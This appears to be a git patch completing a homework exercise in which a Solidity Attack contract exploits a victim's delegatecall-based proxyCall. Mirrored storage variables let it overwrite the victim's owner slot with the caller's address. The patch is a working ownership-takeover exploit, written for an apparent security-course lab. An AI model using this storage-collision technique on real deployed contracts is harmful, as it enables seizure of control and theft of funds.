From d178a2410447789073cefd980b383f7ec092cdfa Mon Sep 17 00:00:00 2001
From: Ting-Jun Wang <levi900227@gmail.com>
Date: Thu, 21 Mar 2024 23:24:00 +0800
Subject: [PATCH] feat: complete exploit

---
 hw1/src/Delegation/Delegation.sol | 15 +++++++++++++++
 1 file changed, 15 insertions(+)

diff --git a/hw1/src/Delegation/Delegation.sol b/hw1/src/Delegation/Delegation.sol
index 01b76a6..99fe3b9 100644
--- a/hw1/src/Delegation/Delegation.sol
+++ b/hw1/src/Delegation/Delegation.sol
@@ -10,6 +10,13 @@ contract Attack {
     address internal immutable victim;
     // TODO: Declare some variable here
     // Note: Checkout the storage layout in victim contract
+    uint256 var0 = 12345;
+    uint8 var1 = 32;
+    string private var2;
+    address private var3;
+    uint8 private var4;
+    address public owner;
+    mapping(address => bool) public result;
 
     constructor(address addr) payable {
         victim = addr;
@@ -17,9 +24,17 @@ contract Attack {
 
     // NOTE: You might need some malicious function here
 
+    function change_owner(address EOA) public {
+        owner = EOA;
+        result[EOA] = true;
+    }
+
     function exploit() external {
         // TODO: Add your implementation here
         // Note: Make sure you know how delegatecall works
         // bytes memory data = ...
+        bytes memory data = abi.encodeWithSignature("change_owner(address)", msg.sender);
+        ID31eg4t3(victim).proxyCall(data);
     }
+
 }